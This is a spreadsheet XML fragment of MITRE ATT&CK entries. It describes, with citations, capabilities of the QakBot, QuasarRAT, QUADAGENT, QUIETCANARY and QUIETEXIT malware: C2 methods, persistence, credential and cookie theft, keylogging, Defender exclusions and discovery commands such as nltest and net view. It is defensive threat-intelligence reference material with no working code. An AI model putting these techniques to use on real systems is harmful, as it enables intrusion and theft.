    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses multiple protocols (HTTPS, HTTP, DNS) for its C2 server as fallback channels if communication with one is unsuccessful.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>relationship--dc4bc74b-cd60-4853-a436-8d5e34b01564</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) has a command to delete its Registry key and scheduled task.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>relationship--b80516ee-1635-43da-babf-201d9f76c1d8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</si>
  <si>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</si>
  <si>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relationship--91aa29c1-28a9-414a-aa3c-a6293b8d078f</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) used the PowerShell filenames &lt;code&gt;Office365DCOMCheck.ps1&lt;/code&gt; and &lt;code&gt;SystemDiskClean.ps1&lt;/code&gt;.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>relationship--86b103ec-dfa0-4c0a-ad96-b885345b4711</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) modifies an HKCU Registry key to store a session identifier unique to the compromised system as well as a pre-shared key used for encrypting and decrypting C2 communications.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>relationship--e0999d7e-deec-446b-a86b-4c8988e20a96</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses PowerShell scripts for execution.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>relationship--d42a4f15-98c5-43df-9e25-7455a764070d</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) checks if a value exists within a Registry key in the HKCU hive whose name is the same as the scheduled task it has created.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>relationship--c2e58b40-7644-4c0c-92ac-b63a565aca44</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) creates a scheduled task to maintain persistence on the victim’s machine.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>relationship--ff2b7bc3-d6ca-488a-bdd5-1f2f27dfc8bd</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) encodes C2 communications with base64.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>relationship--37f48df4-80b1-4f5b-917c-8ac699e5cc0e</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) gathers the current domain the victim system belongs to.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>relationship--6c130246-6222-4395-8edc-cb325b437696</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) gathers the victim username.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>relationship--fc52b3a9-96b2-4595-bedf-54289a42117a</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses VBScripts.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>relationship--69b07a47-2d70-4672-9771-92fa4280b3d3</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses HTTPS and HTTP for C2 communications.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>relationship--0c225034-209b-4ea5-b311-65ee9e82f8fe</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses cmd.exe to execute scripts and commands on the victim’s machine.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>relationship--80c122f6-6aea-4e27-aff2-09467bc4a628</t>
  </si>
  <si>
    <t>[QUIETCANARY](https://attack.mitre.org/software/S1076) has the ability to stage data prior to exfiltration.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--b2e0fa0b-ccc4-4bd9-a981-2aa198491333</t>
  </si>
  <si>
    <t>[QUIETCANARY](https://attack.mitre.org/software/S1076) can use a custom parsing routine to decode the command codes and additional parameters from the C2 before executing them.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--27d0ccf1-00df-40f5-ad96-807e54862467</t>
  </si>
  <si>
    <t>[QUIETCANARY](https://attack.mitre.org/software/S1076) can execute processes in a hidden window.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--9f434edb-a9f5-4306-9868-0914efbb1b8a</t>
  </si>
  <si>
    <t>23 May 2023</t>
  </si>
  <si>
    <t>[QUIETCANARY](https://attack.mitre.org/software/S1076) can call `System.Net.HttpWebRequest` to identify the default proxy configured on the victim computer.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--c07cd7e2-1744-412c-ac58-4ec448a51f01</t>
  </si>
  <si>
    <t>[QUIETCANARY](https://attack.mitre.org/software/S1076) has the ability to retrieve information from the Registry.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--e8805949-55f7-47cd-965c-2edd4221da12</t>
  </si>
  <si>
    <t>[QUIETCANARY](https://attack.mitre.org/software/S1076) can base64 encode C2 communications.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--ef09248a-8356-4636-88da-a58e17e72a45</t>
  </si>
  <si>
    <t>[QUIETCANARY](https://attack.mitre.org/software/S1076) can RC4 encrypt C2 communications.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--1ccef9f1-9fb4-460d-81a9-e0353e9440bd</t>
  </si>
  <si>
    <t>[QUIETCANARY](https://attack.mitre.org/software/S1076) can identify the default proxy setting on a compromised host.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--8cfcd467-dca8-48ae-a6ba-764043a21bcd</t>
  </si>
  <si>
    <t>[QUIETCANARY](https://attack.mitre.org/software/S1076) can use HTTPS for C2 communications.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--c1426caf-83c5-48d3-aa77-0455ddfb85f8</t>
  </si>
  <si>
    <t>[QUIETEXIT](https://attack.mitre.org/software/S1084) can use an inverse negotiated SSH connection as part of its C2.(Citation: Mandiant APT29 Eye Spy Email Nov 22)</t>
  </si>
  <si>
    <t>relationship--89544a80-5144-443a-9560-ab8b7a87fa96</t>
  </si>
  <si>
    <t>[QUIETEXIT](https://attack.mitre.org/software/S1084) can proxy traffic via SOCKS.(Citation: Mandiant APT29 Eye Spy Email Nov 22)</t>
  </si>
  <si>
    <t>relationship--0640af26-888f-4022-ab72-2d0a69dd9bb0</t>
  </si>
  <si>
    <t>[QUIETEXIT](https://attack.mitre.org/software/S1084) can attempt to connect to a second hard-coded C2 if the first hard-coded C2 address fails.(Citation: Mandiant APT29 Eye Spy Email Nov 22)</t>
  </si>
  <si>
    <t>relationship--550d2a38-7dd8-497d-b65d-43b65a3ec49e</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</si>
  <si>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</si>
  <si>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relationship--fd534cf2-9818-492b-9f11-6e5e7994d77b</t>
  </si>
  <si>
    <t>[QUIETEXIT](https://attack.mitre.org/software/S1084) can establish a TCP connection as part of its initial connection to the C2.(Citation: Mandiant APT29 Eye Spy Email Nov 22)</t>
  </si>
  <si>
    <t>relationship--647cf3e6-dcb2-4da2-a60d-b3118cb966bc</t>
  </si>
  <si>
    <t xml:space="preserve">[QakBot](https://attack.mitre.org/software/S0650) has the ability to enumerate windows on a compromised host.(Citation: ATT QakBot April 2021)
</t>
  </si>
  <si>
    <t>relationship--e2a901d9-61a4-49df-8441-3ae622879cdf</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use large file sizes to evade detection.(Citation: Trend Micro Qakbot May 2020)(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>relationship--232c3c4a-8af5-404d-9b72-ac07b81c1b0e</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use advanced web injects to steal web banking credentials.(Citation: Cyberint Qakbot May 2021)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>relationship--a64c16bf-284e-4a74-a5c9-bcaee4d36313</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can conduct brute force attacks to capture credentials.(Citation: Kroll Qakbot June 2020)(Citation: Crowdstrike Qakbot October 2020)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>relationship--91fd8374-eeba-4243-a8de-ff7353236024</t>
  </si>
  <si>
    <t xml:space="preserve">[QakBot](https://attack.mitre.org/software/S0650) can use signed loaders to evade detection.(Citation: ATT QakBot April 2021)(Citation: Deep Instinct Black Basta August 2022)
</t>
  </si>
  <si>
    <t>relationship--6004b82e-5860-4a5c-892e-775086598594</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use obfuscated and encoded scripts.(Citation: Cyberint Qakbot May 2021)(Citation: Trend Micro Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--5483bd88-4073-4fc9-93c8-eb45da7f4d97</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has collected usernames and passwords from Firefox and Chrome.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>relationship--eaf2533c-e25e-4d4c-a7e5-62342a874bb1</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has the ability to use DLL side-loading for execution.(Citation: Deep Instinct Black Basta August 2022)</t>
  </si>
  <si>
    <t>relationship--73ee6e9e-560a-42d1-8578-d5e59899dcf7</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</si>
  <si>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</si>
  <si>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relationship--0e90a4cd-b6b3-49c1-ae6d-b338ef7f9c3b</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can deobfuscate and re-assemble code strings for execution.(Citation: Cyberint Qakbot May 2021)(Citation: ATT QakBot April 2021)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>relationship--386f2d28-9b7b-43b7-bc06-d7d8ffc644e2</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has the ability to modify the Registry to add its binaries to the Windows Defender exclusion list.(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>relationship--faaecea3-e9a8-48a6-bed4-3f470b0adce6</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use domain generation algorithms in C2 communication.(Citation: Trend Micro Qakbot May 2020)</t>
  </si>
  <si>
    <t>relationship--24e3a295-5894-48e0-b1d8-3c6e3df4de18</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can run &lt;code&gt;nltest /domain_trusts /all_trusts&lt;/code&gt; for domain trust discovery.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>relationship--8879fdf1-552c-4e47-a60b-659ebf72772a</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can send stolen information to C2 nodes including passwords, accounts, and emails.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>relationship--41c5b24c-6e33-43b4-ad7e-ebe7506d33b9</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can move laterally using worm-like functionality through exploitation of SMB.(Citation: Crowdstrike Qakbot October 2020)</t>
  </si>
  <si>
    <t>relationship--670efee1-b854-4d39-85b1-b6038e3580e3</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has a module that can proxy C2 communications.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>relationship--0fae3830-5845-414a-8429-b95745b3db32</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</si>
  <si>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</si>
  <si>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relationship--ff2b5737-6a87-4ffb-b61a-89d8f21615b1</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can identify whether it has been run previously on a host by checking for a specified folder.(Citation: ATT QakBot April 2021)</t>
  </si>
  <si>
    <t>relationship--2b4bd264-4c8b-4303-9c54-113284c9e9a0</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can store its configuration information in a randomly named subkey under &lt;code&gt;HKCU\Software\Microsoft&lt;/code&gt;.(Citation: Red Canary Qbot)(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>relationship--2e9e3384-b624-46aa-9a15-eff8eae2b6e1</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has been delivered in ZIP files via HTML smuggling.(Citation: Trend Micro Black Basta October 2022)(Citation: Deep Instinct Black Basta August 2022)</t>
  </si>
  <si>
    <t>relationship--4a759577-622f-4ef0-bff1-ef047aa5a687</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has placed its payload in hidden subdirectories.(Citation: Trend Micro Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--0476f265-c79a-4ff7-a4cd-815d304818c6</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can make small changes to itself in order to change its checksum and hash value.(Citation: Crowdstrike Qakbot October 2020)(Citation: Cyberint Qakbot May 2021)</t>
  </si>
  <si>
    <t>relationship--b82cbc8a-72b9-4f2b-a978-88b066a73cfb</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</si>
  <si>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</si>
  <si>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relationship--aa444f15-777c-4bf6-819b-f03476d59401</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can measure the download speed on a targeted host.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>relationship--4aec046b-4d53-44ea-97d0-e5a57290fb1e</t>
  </si>
  <si>
    <t>The [QakBot](https://attack.mitre.org/software/S0650) web inject module can inject Java Script into web banking pages visited by the victim.(Citation: Kaspersky QakBot September 2021)(Citation: Trend Micro Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--3281ad27-8a05-4389-9438-f0ffce776346</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can capture keystrokes on a compromised host.(Citation: Kroll Qakbot June 2020)(Citation: Trend Micro Qakbot December 2020)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>relationship--c6051e93-2d02-4890-bb0d-d0f3c8be8d15</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has stored stolen emails and other data into new folders prior to exfiltration.(Citation: Kroll Qakbot June 2020)</t>
  </si>
  <si>
    <t>relationship--910d0f07-383b-480b-9637-d5b747353bdc</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</si>
  <si>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</si>
  <si>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relationship--3d8e97f7-9c58-47e1-b2c9-2cc55cca974f</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use &lt;code&gt;net localgroup&lt;/code&gt; to enable discovery of local groups.(Citation: Kaspersky QakBot September 2021)(Citation: Trend Micro Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--6e311ecd-a80d-411b-aaef-ddc69749a8a8</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</si>
  <si>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</si>
  <si>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relationship--403e9797-7824-4840-87ad-b975023d9199</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</si>
  <si>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</si>
  <si>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relationship--3f8ae509-18e1-4189-9aa4-2ae649e56a88</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has been packaged in ISO files in order to bypass Mark of the Web (MOTW) security measures.(Citation: Trend Micro Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--a05a823c-de82-43ec-b235-4f09e0527811</t>
  </si>
  <si>
    <t>The [QakBot](https://attack.mitre.org/software/S0650) payload has been disguised as a PNG file and hidden within LNK files using a Microsoft File Explorer icon.(Citation: Group IB Ransomware September 2020)(Citation: Trend Micro Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--2ef7ec01-8704-4c94-9949-c3239167f93b</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can modify the Registry to store its configuration information in a randomly named subkey under &lt;code&gt;HKCU\Software\Microsoft&lt;/code&gt;.(Citation: Red Canary Qbot)(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>relationship--c039483a-5e0f-47be-b614-0d766eda9e0f</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use MSIExec to spawn multiple cmd.exe processes.(Citation: Crowdstrike Qakbot October 2020)</t>
  </si>
  <si>
    <t>relationship--3655c6ae-38bf-4cd3-b229-b7e182fe6513</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use &lt;code&gt;GetProcAddress&lt;/code&gt; to help delete malicious strings from memory.(Citation: ATT QakBot April 2021)</t>
  </si>
  <si>
    <t>relationship--14a8d0df-a875-45ed-be76-c671c1771179</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use &lt;code&gt;net share&lt;/code&gt; to identify network shares for use in lateral movement.(Citation: Trend Micro Qakbot May 2020)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>relationship--2f6ae8d7-29ee-4af6-9284-f698393ee1b7</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has the ability use TCP to send or receive C2 packets.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>relationship--b4cec817-37bb-4b1f-b165-26241efdcea0</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has hidden code within Excel spreadsheets by turning the font color to white and splitting it across multiple cells.(Citation: Cyberint Qakbot May 2021)</t>
  </si>
  <si>
    <t>relationship--604fa5ae-0a32-45d7-9b9b-595fb43688b6</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can identify peripheral devices on targeted systems.(Citation: Trend Micro Qakbot May 2020)</t>
  </si>
  <si>
    <t>relationship--add3bfcd-3e6d-4978-9e2c-ac6fad18fc5a</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use PowerShell to download and execute payloads.(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>relationship--11475791-a127-476d-acaa-905e2397be5f</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has the ability to check running processes.(Citation: ATT QakBot April 2021)</t>
  </si>
  <si>
    <t>relationship--6a1828c6-bba9-4285-a8af-5017b096252a</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use process hollowing to execute its main payload.(Citation: ATT QakBot April 2021)</t>
  </si>
  <si>
    <t>relationship--30e18b95-a311-4ab5-aa59-a31a20f65f66</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</si>
  <si>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</si>
  <si>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relationship--8235c444-415e-49ee-8ed9-10c24075be1f</t>
  </si>
  <si>
    <t>The [QakBot](https://attack.mitre.org/software/S0650) proxy module can encapsulate SOCKS5 protocol within its own proxy protocol.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>relationship--ea904c7f-f3a7-4e47-884f-bc13e38b09c6</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can maintain persistence by creating an auto-run Registry key.(Citation: Trend Micro Qakbot May 2020)(Citation: Crowdstrike Qakbot October 2020)(Citation: Trend Micro Qakbot December 2020)(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>relationship--2cb6835c-e6e6-46d5-b5d2-45846eac3b74</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</si>
  <si>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</si>
  <si>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relationship--03e7f671-763a-4027-af51-d01606c14a2a</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can identify remote systems through the &lt;code&gt;net view&lt;/code&gt; command.(Citation: Crowdstrike Qakbot October 2020)(Citation: Kaspersky QakBot September 2021)(Citation: Trend Micro Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--0cbe929a-96e2-4ff8-bf8d-501a9a8d2ad2</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has the ability to use removable drives to spread through compromised networks.(Citation: Trend Micro Qakbot May 2020)</t>
  </si>
  <si>
    <t>relationship--cc3ca652-5f6f-4d8b-8b3d-51ab6f776e8a</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</si>
  <si>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</si>
  <si>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relationship--ea33531e-7a8f-45a1-a408-c8f405512aaa</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</si>
  <si>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</si>
  <si>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relationship--e916bd35-cd90-4c1f-b600-aedffbf4de3c</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can identify the installed antivirus product on a targeted system.(Citation: Crowdstrike Qakbot October 2020)(Citation: ATT QakBot April 2021)(Citation: ATT QakBot April 2021)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>relationship--1343df30-b011-42f7-b3a3-a5d1d2f0b9c6</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can enumerate a list of installed programs.(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>relationship--e342ee2b-d7b6-4a48-a689-06a68efe589e</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can encrypt and pack malicious payloads.(Citation: Cyberint Qakbot May 2021)</t>
  </si>
  <si>
    <t>relationship--ec62edb4-a463-46f8-82de-1a893caceb5e</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</si>
  <si>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</si>
  <si>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relationship--c191afcc-515a-4f0c-85cc-15af0fd3674a</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</si>
  <si>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</si>
  <si>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relationship--b5e98443-7d3a-4a0a-975d-a5c1d564bd15</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can Base64 encode system information sent to C2.(Citation: Crowdstrike Qakbot October 2020)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>relationship--d4ee44c8-c389-4c02-8601-ee7c194d249e</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has the ability to capture web session cookies.(Citation: Kroll Qakbot June 2020)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>relationship--7f92fc3c-044c-4095-be4b-f6482a5619d1</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can RC4 encrypt strings in C2 communication.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>relationship--4b70ec83-7488-4b4e-bd0b-58fb45da3a15</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can check the compromised host for the presence of multiple executables associated with analysis tools and halt execution if any are found.(Citation: Trend Micro Qakbot May 2020)(Citation: ATT QakBot April 2021)</t>
  </si>
  <si>
    <t>relationship--05d8ec5a-0fc4-4037-913f-4d48e658ee9b</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can collect system information including the OS version and domain on a compromised host.(Citation: Crowdstrike Qakbot October 2020)(Citation: ATT QakBot April 2021)(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>relationship--d5be9ea1-7bf2-453b-bbca-19a9d82ea532</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</si>
  <si>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</si>
  <si>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relationship--74eb5b40-3c37-49c3-ba39-63dd8f8b595a</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use &lt;code&gt;netstat&lt;/code&gt; to enumerate current network connections.(Citation: Kaspersky QakBot September 2021)(Citation: Trend Micro Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--e88e3288-28c9-4ae3-93a7-45d0658eaff8</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can identify the user name on a compromised system.(Citation: Kaspersky QakBot September 2021)(Citation: Trend Micro Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--474912e8-0f81-439c-a613-51cbb9c0baa9</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can identify the system time on a targeted host.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>relationship--401790f5-abf5-4523-ac98-b200d3b34a7e</t>
  </si>
  <si>
    <t>The [QakBot](https://attack.mitre.org/software/S0650) dropper can delay dropping the payload to evade detection.(Citation: Cyberint Qakbot May 2021)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>relationship--a8e662f8-e644-44d8-8aca-79e8d7924826</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</si>
  <si>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</si>
  <si>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relationship--d50a6bf2-266b-4770-809a-c1bf3e81305f</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has the ability to use HTTP and HTTPS in communication with C2 servers.(Citation: Trend Micro Qakbot May 2020)(Citation: Crowdstrike Qakbot October 2020)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>relationship--5d5a903f-d71f-42d5-941b-154d2e06ca78</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use cmd.exe to launch itself and to execute multiple C2 commands.(Citation: Crowdstrike Qakbot October 2020)(Citation: ATT QakBot April 2021)(Citation: Kaspersky QakBot September 2021)(Citation: Trend Micro Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--12362fa5-736b-4cac-9d74-51cd559f1e7c</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can execute WMI queries to gather information.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>relationship--dcda00f6-f5c1-412f-acb1-a431235fc6cc</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can remotely create a temporary service on a target host.(Citation: NCC Group Black Basta June 2022)</t>
  </si>
  <si>
    <t>relationship--24566f69-12b6-4703-86e2-bbf966ac5535</t>
  </si>
  <si>
    <t xml:space="preserve">
[QuasarRAT](https://attack.mitre.org/software/S0262) can generate a UAC pop-up Window to prompt the target user to run a command as the administrator.(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t>relationship--7037e3b3-33ea-43d6-bfa0-95178066131a</t>
  </si>
  <si>
    <t>02 August 2022</t>
  </si>
  <si>
    <t>A [QuasarRAT](https://attack.mitre.org/software/S0262) .dll file is digitally signed by a certificate from AirVPN.(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>relationship--cf0b5987-3d37-481c-979c-36c597b91fc5</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can obtain passwords from FTP clients.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>relationship--a628def4-31a4-475e-b4b8-615534d8d585</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can obtain passwords from common FTP clients.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>relationship--9f0f23ed-644d-44f5-bee9-c3f44f04a6d8</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can obtain passwords from common web browsers.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>relationship--360f1c0d-c6ec-4d49-92a0-e8ce63559960</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can retrieve files from compromised client machines.(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t>relationship--77def9ad-52ea-44c0-b800-42b17323a985</t>
  </si>
  <si>
    <t xml:space="preserve">
[QuasarRAT](https://attack.mitre.org/software/S0262) has the ability to set file attributes to "hidden" to hide files from the compromised user's view in Windows File Explorer.(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t>relationship--5d96e66b-372a-43de-892d-30086d7ff00e</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</si>
  <si>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</si>
  <si>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relationship--41664428-398a-4b71-9418-b1bd1e4cefc4</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can download files to the victim’s machine and execute them.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>relationship--4a33da76-c838-48fe-97ad-80d285cf165f</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) has a built-in keylogger.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>relationship--2ede8fe4-0a44-4c31-ba4c-d3282d57b4b8</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) has a command to edit the Registry on the victim’s machine.(Citation: GitHub QuasarRAT)(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t>relationship--53e09f15-3162-4480-8eb4-709e9c18d7fb</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can use TCP for C2 communication.(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t>relationship--7e9168ae-f0dd-4223-bc4b-9f94b08f99ac</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can use port 4782 on the compromised host for TCP callbacks.(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t>relationship--bfbabaff-1918-4a35-b5ab-8aa981e50027</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can communicate over a reverse proxy using SOCKS5.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>relationship--ba218f25-8703-4042-98b0-42afe1c49503</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</si>
  <si>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</si>
  <si>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relationship--3e3a5bf5-1e90-45d2-b90a-3b919f5425d5</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) has a module for performing remote desktop access.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>relationship--0a26c696-1288-4cb3-a24e-bbd64925b9f7</t>
  </si>
  <si>
